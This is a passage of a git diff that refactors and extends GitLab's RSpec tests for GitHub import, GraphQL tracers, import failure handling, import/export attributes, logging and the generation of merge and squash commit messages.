
true : raise(described_class::CLIENT_CONNECTION_ERROR, 'execution expired') + end + end end diff --git a/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb b/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb index 0448ada6bca..a0e78186caa 100644 --- a/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb +++ b/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb @@ -173,9 +173,11 @@ RSpec.describe Gitlab::GithubImport::Importer::DiffNoteImporter, :aggregate_fail EOB end - it 'imports the note as diff note' do + before do stub_user_finder(user.id, true) + end + it 'imports the note as diff note' do expect { subject.execute } .to change(DiffNote, :count) .by(1) @@ -212,6 +214,29 @@ RSpec.describe Gitlab::GithubImport::Importer::DiffNoteImporter, :aggregate_fail ``` NOTE end + + context 'when the note diff file creation fails' do + it 'falls back to the LegacyDiffNote' do + exception = ::DiffNote::NoteDiffFileCreationError.new('Failed to create diff note file') + + expect_next_instance_of(::Import::Github::Notes::CreateService) do |service| + expect(service) + .to receive(:execute) + .and_raise(exception) + end + + expect(Gitlab::GithubImport::Logger) + .to receive(:warn) + .with( + message: 'Failed to create diff note file', + 'error.class': 'DiffNote::NoteDiffFileCreationError' + ) + + expect { subject.execute } + .to change(LegacyDiffNote, :count) + .and not_change(DiffNote, :count) + end + end end end end diff --git a/spec/lib/gitlab/github_import/importer/note_importer_spec.rb b/spec/lib/gitlab/github_import/importer/note_importer_spec.rb index 96d8acbd3de..165f543525d 100644 --- a/spec/lib/gitlab/github_import/importer/note_importer_spec.rb +++ b/spec/lib/gitlab/github_import/importer/note_importer_spec.rb @@ -52,6 +52,7 @@ RSpec.describe Gitlab::GithubImport::Importer::NoteImporter do project_id: project.id, author_id: user.id, note: 'This is my note', + discussion_id: match(/\A[0-9a-f]{40}\z/), system: 
false, created_at: created_at, updated_at: updated_at @@ -82,6 +83,7 @@ RSpec.describe Gitlab::GithubImport::Importer::NoteImporter do project_id: project.id, author_id: project.creator_id, note: "*Created by: alice*\n\nThis is my note", + discussion_id: match(/\A[0-9a-f]{40}\z/), system: false, created_at: created_at, updated_at: updated_at diff --git a/spec/lib/gitlab/github_import/parallel_importer_spec.rb b/spec/lib/gitlab/github_import/parallel_importer_spec.rb index c7b300ff043..d418e87284d 100644 --- a/spec/lib/gitlab/github_import/parallel_importer_spec.rb +++ b/spec/lib/gitlab/github_import/parallel_importer_spec.rb @@ -27,8 +27,13 @@ RSpec.describe Gitlab::GithubImport::ParallelImporter do before do create(:import_state, :started, project: project) + worker = double(:worker) expect(Gitlab::GithubImport::Stage::ImportRepositoryWorker) + .to receive(:with_status) + .and_return(worker) + + expect(worker) .to receive(:perform_async) .with(project.id) .and_return('123') diff --git a/spec/lib/gitlab/gon_helper_spec.rb b/spec/lib/gitlab/gon_helper_spec.rb index 3d3f381b6d2..b8ed4cf608d 100644 --- a/spec/lib/gitlab/gon_helper_spec.rb +++ b/spec/lib/gitlab/gon_helper_spec.rb @@ -15,7 +15,7 @@ RSpec.describe Gitlab::GonHelper do end it 'pushes a feature flag to the frontend' do - gon = instance_double('gon') + gon = class_double('Gon') thing = stub_feature_flag_gate('thing') stub_feature_flags(my_feature_flag: thing) diff --git a/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb b/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb index 771f6e1ec46..5d444775e53 100644 --- a/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb +++ b/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb @@ -192,7 +192,7 @@ RSpec.describe Gitlab::Gpg::InvalidGpgSignatureUpdater do project: project, commit_sha: commit_sha, gpg_key: nil, - gpg_key_primary_keyid: GpgHelpers::User3.subkey_fingerprints.last[24..-1], + gpg_key_primary_keyid: 
GpgHelpers::User3.subkey_fingerprints.last[24..], verification_status: 'unknown_key' end diff --git a/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb b/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb index 3ce09740ec8..968d938a911 100644 --- a/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb +++ b/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe Gitlab::GrapeLogging::Loggers::ExceptionLogger do - let(:mock_request) { OpenStruct.new(env: {}) } + let(:mock_request) { double('env', env: {}) } let(:response_body) { nil } describe ".parameters" do @@ -76,7 +76,7 @@ RSpec.describe Gitlab::GrapeLogging::Loggers::ExceptionLogger do describe 'when an exception is available' do let(:exception) { RuntimeError.new('This is a test') } let(:mock_request) do - OpenStruct.new( + double('env', env: { ::API::Helpers::API_EXCEPTION_ENV => exception } diff --git a/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb b/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb index 0047d24a215..0741088c915 100644 --- a/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb +++ b/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb @@ -9,7 +9,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { {} } let(:query_type) { GraphQL::ObjectType.new } let(:schema) { GraphQL::Schema.define(query: query_type, mutation: nil)} - let(:context) { GraphQL::Query::Context.new(query: OpenStruct.new(schema: schema), values: nil, object: nil) } + let(:context) { GraphQL::Query::Context.new(query: double('query', schema: schema), values: nil, object: nil) } let_it_be(:column_order_id) { Gitlab::Pagination::Keyset::ColumnOrderDefinition.new(attribute_name: 'id', order_expression: Project.arel_table[:id].asc) } let_it_be(:column_order_id_desc) { 
Gitlab::Pagination::Keyset::ColumnOrderDefinition.new(attribute_name: 'id', order_expression: Project.arel_table[:id].desc) } @@ -98,7 +98,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:nodes) { Project.all.order(Gitlab::Pagination::Keyset::Order.build([column_order_id_desc])) } it 'returns the correct nodes' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end end end @@ -107,7 +107,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { { after: encoded_cursor(projects[1]) } } it 'only returns the project before the selected one' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end context 'when the sort order is descending' do diff --git a/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb b/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb index 8ef5f1147c5..b511a294f97 100644 --- a/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb +++ b/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb @@ -7,7 +7,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { {} } let(:query_type) { GraphQL::ObjectType.new } let(:schema) { GraphQL::Schema.define(query: query_type, mutation: nil)} - let(:context) { GraphQL::Query::Context.new(query: OpenStruct.new(schema: schema), values: nil, object: nil) } + let(:context) { GraphQL::Query::Context.new(query: double('query', schema: schema), values: nil, object: nil) } subject(:connection) do described_class.new(nodes, **{ context: context, max_page_size: 3 }.merge(arguments)) @@ -120,7 +120,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:nodes) { Project.all.order(id: :desc) } it 'returns the correct nodes' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + 
expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end end end @@ -129,7 +129,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { { after: encoded_cursor(projects[1]) } } it 'only returns the project before the selected one' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end context 'when the sort order is descending' do diff --git a/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb b/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb index d83ac4dabc5..5bc077a963e 100644 --- a/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb +++ b/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb @@ -1,6 +1,5 @@ # frozen_string_literal: true -require "fast_spec_helper" -require "support/graphql/fake_query_type" +require "spec_helper" RSpec.describe Gitlab::Graphql::Tracers::LoggerTracer do let(:dummy_schema) do @@ -49,4 +48,15 @@ RSpec.describe Gitlab::Graphql::Tracers::LoggerTracer do dummy_schema.execute(query_string, variables: variables) end + + it 'logs exceptions for breaking queries' do + query_string = "query fooOperation { breakingField }" + + expect(::Gitlab::GraphqlLogger).to receive(:info).with(a_hash_including({ + 'exception.message' => 'This field is supposed to break', + 'exception.class' => 'RuntimeError' + })) + + expect { dummy_schema.execute(query_string) }.to raise_error(/This field is supposed to break/) + end end diff --git a/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb b/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb index ff6a76aa319..168f5aa529e 100644 --- a/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb +++ b/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb @@ -1,6 +1,6 @@ # frozen_string_literal: true -require 'fast_spec_helper' +require 'spec_helper' require 'rspec-parameterized' require "support/graphql/fake_query_type" @@ -36,7 +36,7 @@ RSpec.describe 
Gitlab::Graphql::Tracers::MetricsTracer do end with_them do - it 'increments sli' do + it 'increments apdex sli' do # Trigger initialization fake_schema @@ -56,5 +56,13 @@ RSpec.describe Gitlab::Graphql::Tracers::MetricsTracer do fake_schema.execute("query lorem { helloWorld }") end end + + it "does not record apdex for failing queries" do + query_string = "query fooOperation { breakingField }" + + expect(Gitlab::Metrics::RailsSlis.graphql_query_apdex).not_to receive(:increment) + + expect { fake_schema.execute(query_string) }.to raise_error(/This field is supposed to break/) + end end end diff --git a/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb b/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb index 7f837e28772..986120dcd95 100644 --- a/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb +++ b/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb @@ -20,6 +20,7 @@ RSpec.describe Gitlab::Graphql::Tracers::TimerTracer do before do current_time = 0 + allow(tracer_spy).to receive(:trace) allow(Gitlab::Metrics::System).to receive(:monotonic_time) do current_time += expected_duration end @@ -30,6 +31,18 @@ RSpec.describe Gitlab::Graphql::Tracers::TimerTracer do dummy_schema.execute(query_string) + expect_to_have_traced(tracer_spy, expected_duration, query_string) + end + + it "adds a duration_s even if the query failed" do + query_string = "query fooOperation { breakingField }" + + expect { dummy_schema.execute(query_string) }.to raise_error(/This field is supposed to break/) + + expect_to_have_traced(tracer_spy, expected_duration, query_string) + end + + def expect_to_have_traced(tracer_spy, expected_duration, query_string) # "parse" and "execute_query" are just arbitrary trace events expect(tracer_spy).to have_received(:trace).with("parse", { duration_s: expected_duration, diff --git a/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb b/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb index 9e6ad35861f..ddd681f75f0 100644 --- 
a/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb +++ b/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb @@ -15,6 +15,7 @@ RSpec.describe Gitlab::HookData::MergeRequestBuilder do assignee_id assignee_ids author_id + blocking_discussions_resolved created_at description head_pipeline_id diff --git a/spec/lib/gitlab/import/import_failure_service_spec.rb b/spec/lib/gitlab/import/import_failure_service_spec.rb index c16d4a7c804..e3fec63adde 100644 --- a/spec/lib/gitlab/import/import_failure_service_spec.rb +++ b/spec/lib/gitlab/import/import_failure_service_spec.rb @@ -7,58 +7,48 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do let_it_be(:project) { create(:project, :import_started, import_type: import_type) } let(:exception) { StandardError.new('some error') } - let(:arguments) { { project_id: project.id } } - let(:base_arguments) { { error_source: 'SomeImporter', exception: exception }.merge(arguments) } - let(:exe_arguments) { { fail_import: false, metrics: false } } + let(:import_state) { nil } + let(:fail_import) { false } + let(:metrics) { false } + + let(:arguments) do + { + project_id: project.id, + error_source: 'SomeImporter', + exception: exception, + fail_import: fail_import, + metrics: metrics, + import_state: import_state + } + end describe '.track' do + let(:instance) { double(:failure_service) } + context 'with all arguments provided' do - let(:instance) { double(:failure_service) } - let(:instance_arguments) do + let(:arguments) do { exception: exception, import_state: '_import_state_', project_id: '_project_id_', - error_source: '_error_source_' - } - end - - let(:exe_arguments) do - { + error_source: '_error_source_', fail_import: '_fail_import_', metrics: '_metrics_' } end it 'invokes a new instance and executes' do - expect(described_class).to receive(:new).with(**instance_arguments).and_return(instance) - expect(instance).to receive(:execute).with(**exe_arguments) + expect(described_class).to 
receive(:new).with(**arguments).and_return(instance) + expect(instance).to receive(:execute) - described_class.track(**instance_arguments.merge(exe_arguments)) + described_class.track(**arguments) end end context 'with only necessary arguments utilizing defaults' do - let(:instance) { double(:failure_service) } - let(:instance_arguments) do - { - exception: exception, - import_state: nil, - project_id: nil, - error_source: nil - } - end - - let(:exe_arguments) do - { - fail_import: false, - metrics: false - } - end - it 'invokes a new instance and executes' do - expect(described_class).to receive(:new).with(**instance_arguments).and_return(instance) - expect(instance).to receive(:execute).with(**exe_arguments) + expect(described_class).to receive(:new).with(a_hash_including(exception: exception)).and_return(instance) + expect(instance).to receive(:execute) described_class.track(exception: exception) end @@ -66,7 +56,7 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do end describe '#execute' do - subject(:service) { described_class.new(**base_arguments) } + subject(:service) { described_class.new(**arguments) } shared_examples 'logs the exception and fails the import' do it 'when the failure does not abort the import' do @@ -89,13 +79,14 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do source: 'SomeImporter' ) - service.execute(**exe_arguments) + service.execute expect(project.import_state.reload.status).to eq('failed') expect(project.import_failures).not_to be_empty expect(project.import_failures.last.exception_class).to eq('StandardError') expect(project.import_failures.last.exception_message).to eq('some error') + expect(project.import_failures.last.retry_count).to eq(0) end end @@ -120,32 +111,36 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do source: 'SomeImporter' ) - service.execute(**exe_arguments) + service.execute expect(project.import_state.reload.status).to 
eq('started') expect(project.import_failures).not_to be_empty expect(project.import_failures.last.exception_class).to eq('StandardError') expect(project.import_failures.last.exception_message).to eq('some error') + expect(project.import_failures.last.retry_count).to eq(nil) end end context 'when tracking metrics' do - let(:exe_arguments) { { fail_import: false, metrics: true } } + let(:metrics) { true } it 'tracks the failed import' do - metrics = double(:metrics) + metrics_double = double(:metrics) - expect(Gitlab::Import::Metrics).to receive(:new).with("#{project.import_type}_importer", project).and_return(metrics) - expect(metrics).to receive(:track_failed_import) + expect(Gitlab::Import::Metrics) + .to receive(:new) + .with("#{project.import_type}_importer", project) + .and_return(metrics_double) + expect(metrics_double).to receive(:track_failed_import) - service.execute(**exe_arguments) + service.execute end end context 'when using the project as reference' do context 'when it fails the import' do - let(:exe_arguments) { { fail_import: true, metrics: false } } + let(:fail_import) { true } it_behaves_like 'logs the exception and fails the import' end @@ -156,10 +151,10 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do end context 'when using the import_state as reference' do - let(:arguments) { { import_state: project.import_state } } + let(:import_state) { project.import_state } context 'when it fails the import' do - let(:exe_arguments) { { fail_import: true, metrics: false } } + let(:fail_import) { true } it_behaves_like 'logs the exception and fails the import' end diff --git a/spec/lib/gitlab/import/set_async_jid_spec.rb b/spec/lib/gitlab/import/set_async_jid_spec.rb index 6931a7a953d..016f7cac61a 100644 --- a/spec/lib/gitlab/import/set_async_jid_spec.rb +++ b/spec/lib/gitlab/import/set_async_jid_spec.rb @@ -8,7 +8,7 @@ RSpec.describe Gitlab::Import::SetAsyncJid do it 'sets the JID in Redis' do expect(Gitlab::SidekiqStatus) .to 
receive(:set) - .with("async-import/project-import-state/#{project.id}", Gitlab::Import::StuckImportJob::IMPORT_JOBS_EXPIRATION) + .with("async-import/project-import-state/#{project.id}", Gitlab::Import::StuckImportJob::IMPORT_JOBS_EXPIRATION, value: 2) .and_call_original described_class.set_jid(project.import_state) diff --git a/spec/lib/gitlab/import_export/all_models.yml b/spec/lib/gitlab/import_export/all_models.yml index b474f5825fd..7ed80cbcf66 100644 --- a/spec/lib/gitlab/import_export/all_models.yml +++ b/spec/lib/gitlab/import_export/all_models.yml @@ -61,6 +61,7 @@ issues: - pending_escalations - customer_relations_contacts - issue_customer_relations_contacts +- email work_item_type: - issues events: @@ -197,6 +198,7 @@ merge_requests: - system_note_metadata - note_authors - cleanup_schedule +- compliance_violations external_pull_requests: - project merge_request_diff: @@ -223,6 +225,7 @@ ci_pipelines: - ci_ref - stages - statuses +- statuses_order_id_desc - latest_statuses_ordered_by_stage - builds - bridges @@ -596,6 +599,8 @@ project: - security_scans - ci_feature_usages - bulk_import_exports +- ci_project_mirror +- sync_events award_emoji: - awardable - user diff --git a/spec/lib/gitlab/import_export/attributes_permitter_spec.rb b/spec/lib/gitlab/import_export/attributes_permitter_spec.rb index 8ae387d95e3..c748f966463 100644 --- a/spec/lib/gitlab/import_export/attributes_permitter_spec.rb +++ b/spec/lib/gitlab/import_export/attributes_permitter_spec.rb @@ -140,6 +140,7 @@ RSpec.describe Gitlab::ImportExport::AttributesPermitter do :zoom_meetings | true :issues | true :group_members | true + :project | true end with_them do @@ -150,7 +151,11 @@ RSpec.describe Gitlab::ImportExport::AttributesPermitter do describe 'included_attributes for Project' do subject { described_class.new } - additional_attributes = { user: %w[id] } + # these are attributes for which either a special exception is made or are available only via included modules and not attribute 
introspection + additional_attributes = { + user: %w[id], + project: %w[auto_devops_deploy_strategy auto_devops_enabled issues_enabled jobs_enabled merge_requests_enabled snippets_enabled wiki_enabled build_git_strategy build_enabled security_and_compliance_enabled requirements_enabled] + } Gitlab::ImportExport::Config.new.to_h[:included_attributes].each do |relation_sym, permitted_attributes| context "for #{relation_sym}" do diff --git a/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb b/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb index 6bb6be07749..1d8b137c196 100644 --- a/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb +++ b/spec/lib/gitlab/import_export/project/tree_restorer_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' def match_mr1_note(content_regex) - MergeRequest.find_by(title: 'MR1').notes.select { |n| n.note.match(/#{content_regex}/)}.first + MergeRequest.find_by(title: 'MR1').notes.find { |n| n.note.match(/#{content_regex}/) } end RSpec.describe Gitlab::ImportExport::Project::TreeRestorer do @@ -75,7 +75,7 @@ RSpec.describe Gitlab::ImportExport::Project::TreeRestorer do context 'for an Issue' do it 'does not import note_html' do note_content = 'Quo reprehenderit aliquam qui dicta impedit cupiditate eligendi' - issue_note = Issue.find_by(description: 'Aliquam enim illo et possimus.').notes.select { |n| n.note.match(/#{note_content}/)}.first + issue_note = Issue.find_by(description: 'Aliquam enim illo et possimus.').notes.find { |n| n.note.match(/#{note_content}/) } expect(issue_note.note_html).to match(/#{note_content}/) end @@ -552,7 +552,7 @@ RSpec.describe Gitlab::ImportExport::Project::TreeRestorer do it 'issue system note metadata restored successfully' do note_content = 'created merge request !1 to address this issue' - note = project.issues.first.notes.select { |n| n.note.match(/#{note_content}/)}.first + note = project.issues.first.notes.find { |n| n.note.match(/#{note_content}/)} 
expect(note.noteable_type).to eq('Issue') expect(note.system).to eq(true) diff --git a/spec/lib/gitlab/import_export/safe_model_attributes.yml b/spec/lib/gitlab/import_export/safe_model_attributes.yml index 9daa3b32fd1..6ffe2187466 100644 --- a/spec/lib/gitlab/import_export/safe_model_attributes.yml +++ b/spec/lib/gitlab/import_export/safe_model_attributes.yml @@ -33,6 +33,7 @@ Issue: - health_status - external_key - issue_type +- email_message_id Event: - id - target_type @@ -562,6 +563,7 @@ Project: - autoclose_referenced_issues - suggestion_commit_message - merge_commit_template +- squash_commit_template ProjectTracingSetting: - external_url Author: diff --git a/spec/lib/gitlab/lets_encrypt/client_spec.rb b/spec/lib/gitlab/lets_encrypt/client_spec.rb index 54b9bd3bfba..f1284318687 100644 --- a/spec/lib/gitlab/lets_encrypt/client_spec.rb +++ b/spec/lib/gitlab/lets_encrypt/client_spec.rb @@ -73,7 +73,7 @@ RSpec.describe ::Gitlab::LetsEncrypt::Client do subject(:new_order) { client.new_order('example.com') } before do - order_double = instance_double('Acme::Order') + order_double = double('Acme::Order') allow(stub_client).to receive(:new_order).and_return(order_double) end @@ -107,7 +107,7 @@ RSpec.describe ::Gitlab::LetsEncrypt::Client do subject { client.load_challenge(url) } before do - acme_challenge = instance_double('Acme::Client::Resources::Challenge') + acme_challenge = double('Acme::Client::Resources::Challenge') allow(stub_client).to receive(:challenge).with(url: url).and_return(acme_challenge) end diff --git a/spec/lib/gitlab/lograge/custom_options_spec.rb b/spec/lib/gitlab/lograge/custom_options_spec.rb index a4ae39a835a..d8f351bb8a3 100644 --- a/spec/lib/gitlab/lograge/custom_options_spec.rb +++ b/spec/lib/gitlab/lograge/custom_options_spec.rb @@ -95,5 +95,55 @@ RSpec.describe Gitlab::Lograge::CustomOptions do expect(subject[correlation_id_key]).to eq('123456') end end + + context 'when feature flags are present', :request_store do + before do + 
allow(Feature).to receive(:log_feature_flag_states?).and_return(false) + + definitions = {} + [:enabled_feature, :disabled_feature].each do |flag_name| + definitions[flag_name] = Feature::Definition.new("development/enabled_feature.yml", + name: flag_name, + type: 'development', + log_state_changes: true, + default_enabled: false) + + allow(Feature).to receive(:log_feature_flag_states?).with(flag_name).and_call_original + end + + allow(Feature::Definition).to receive(:definitions).and_return(definitions) + + Feature.enable(:enabled_feature) + Feature.disable(:disabled_feature) + end + + context 'and :feature_flag_log_states is enabled' do + before do + Feature.enable(:feature_flag_state_logs) + end + + it 'adds feature flag events' do + Feature.enabled?(:enabled_feature) + Feature.enabled?(:disabled_feature) + + expect(subject).to have_key(:feature_flag_states) + expect(subject[:feature_flag_states]).to match_array(%w[enabled_feature:1 disabled_feature:0]) + end + end + + context 'and :feature_flag_log_states is disabled' do + before do + Feature.disable(:feature_flag_state_logs) + end + + it 'does not track or add feature flag events' do + Feature.enabled?(:enabled_feature) + Feature.enabled?(:disabled_feature) + + expect(subject).not_to have_key(:feature_flag_states) + expect(Feature).not_to receive(:log_feature_flag_state) + end + end + end end end diff --git a/spec/lib/gitlab/merge_requests/commit_message_generator_spec.rb b/spec/lib/gitlab/merge_requests/commit_message_generator_spec.rb new file mode 100644 index 00000000000..65c76aac10c --- /dev/null +++ b/spec/lib/gitlab/merge_requests/commit_message_generator_spec.rb @@ -0,0 +1,290 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::MergeRequests::CommitMessageGenerator do + let(:merge_commit_template) { nil } + let(:squash_commit_template) { nil } + let(:project) do + create( + :project, + :public, + :repository, + merge_commit_template: merge_commit_template, + 
squash_commit_template: squash_commit_template + ) + end + + let(:user) { project.creator } + let(:source_branch) { 'feature' } + let(:merge_request_description) { "Merge Request Description\nNext line" } + let(:merge_request_title) { 'Bugfix' } + let(:merge_request) do + create( + :merge_request, + :simple, + source_project: project, + target_project: project, + target_branch: 'master', + source_branch: source_branch, + author: user, + description: merge_request_description, + title: merge_request_title + ) + end + + subject { described_class.new(merge_request: merge_request) } + + shared_examples_for 'commit message with template' do |message_template_name| + it 'returns nil when template is not set in target project' do + expect(result_message).to be_nil + end + + context 'when project has custom commit template' do + let(message_template_name) { <<~MSG.rstrip } + %{title} + + See merge request %{reference} + MSG + + it 'uses custom template' do + expect(result_message).to eq <<~MSG.rstrip + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when project has commit template with closed issues' do + let(message_template_name) { <<~MSG.rstrip } + Merge branch '%{source_branch}' into '%{target_branch}' + + %{title} + + %{issues} + + See merge request %{reference} + MSG + + it 'omits issues and new lines when no issues are mentioned in description' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when MR closes issues' do + let(:issue_1) { create(:issue, project: project) } + let(:issue_2) { create(:issue, project: project) } + let(:merge_request_description) { "Description\n\nclosing #{issue_1.to_reference}, #{issue_2.to_reference}" } + + it 'includes them and keeps new line characters' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + 
Bugfix + + Closes #{issue_1.to_reference} and #{issue_2.to_reference} + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + end + + context 'when project has commit template with description' do + let(message_template_name) { <<~MSG.rstrip } + Merge branch '%{source_branch}' into '%{target_branch}' + + %{title} + + %{description} + + See merge request %{reference} + MSG + + it 'uses template' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + Merge Request Description + Next line + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when description is empty string' do + let(:merge_request_description) { '' } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when description is nil' do + let(:merge_request_description) { nil } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when description is blank string' do + let(:merge_request_description) { "\n\r \n" } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + end + + context 'when custom commit template contains placeholder in the middle or beginning of the line' do + let(message_template_name) { <<~MSG.rstrip } + Merge branch '%{source_branch}' into '%{target_branch}' + + %{description} %{title} + + See merge request %{reference} + MSG + + it 'uses 
custom template' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Merge Request Description + Next line Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when description is empty string' do + let(:merge_request_description) { '' } + + it 'does not remove new line characters before empty placeholder' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + end + + context 'when project has template with CRLF newlines' do + let(message_template_name) do + "Merge branch '%{source_branch}' into '%{target_branch}'\r\n\r\n%{title}\r\n\r\n%{description}\r\n\r\nSee merge request %{reference}" + end + + it 'converts it to LF newlines' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + Merge Request Description + Next line + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + + context 'when description is empty string' do + let(:merge_request_description) { '' } + + it 'skips description placeholder and removes new line characters before it' do + expect(result_message).to eq <<~MSG.rstrip + Merge branch 'feature' into 'master' + + Bugfix + + See merge request #{merge_request.to_reference(full: true)} + MSG + end + end + + context 'when project has merge commit template with first_commit' do + let(message_template_name) { <<~MSG.rstrip } + Message: %{first_commit} + MSG + + it 'uses first commit' do + expect(result_message).to eq <<~MSG.rstrip + Message: Feature added + + Signed-off-by: Dmitriy Zaporozhets <dmitriy.zaporozhets@gmail.com> + MSG + end + + context 'when branch has no unmerged commits' do + let(:source_branch) { 'v1.1.0' } + + it 'is an empty string' do + expect(result_message).to eq 'Message: ' + end + end + end + + context 'when project has merge commit template with 
first_multiline_commit' do + let(message_template_name) { <<~MSG.rstrip } + Message: %{first_multiline_commit} + MSG + + it 'uses first multiline commit' do + expect(result_message).to eq <<~MSG.rstrip + Message: Feature added + + Signed-off-by: Dmitriy Zaporozhets <dmitriy.zaporozhets@gmail.com> + MSG + end + + context 'when branch has no multiline commits' do + let(:source_branch) { 'spooky-stuff' } + + it 'is mr title' do + expect(result_message).to eq 'Message: Bugfix' + end + end + end + end + end + + describe '#merge_message' do + let(:result_message) { subject.merge_message } + + it_behaves_like 'commit message with template', :merge_commit_template + end + + describe '#squash_message' do + let(:result_message) { subject.squash_message } + + it_behaves_like 'commit message with template', :squash_commit_template + end +end diff --git a/spec/lib/gitlab/merge_requests/merge_commit_message_spec.rb b/spec/lib/gitlab/merge_requests/merge_commit_message_spec.rb deleted file mode 100644 index 884f8df5e56..00000000000 --- a/spec/lib/gitlab/merge_requests/merge_commit_message_spec.rb +++ /dev/null @@ -1,219 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::MergeRequests::MergeCommitMessage do - let(:merge_commit_template) { nil } - let(:project) { create(:project, :public, :repository, merge_commit_template: merge_commit_template) } - let(:user) { project.creator } - let(:merge_request_description) { "Merge Request Description\nNext line" } - let(:merge_request_title) { 'Bugfix' } - let(:merge_request) do - create( - :merge_request, - :simple, - source_project: project, - target_project: project, - author: user, - description: merge_request_description, - title: merge_request_title - ) - end - - subject { described_class.new(merge_request: merge_request) } - - it 'returns nil when template is not set in target project' do - expect(subject.message).to be_nil - end - - context 'when project has custom merge commit template' do - 
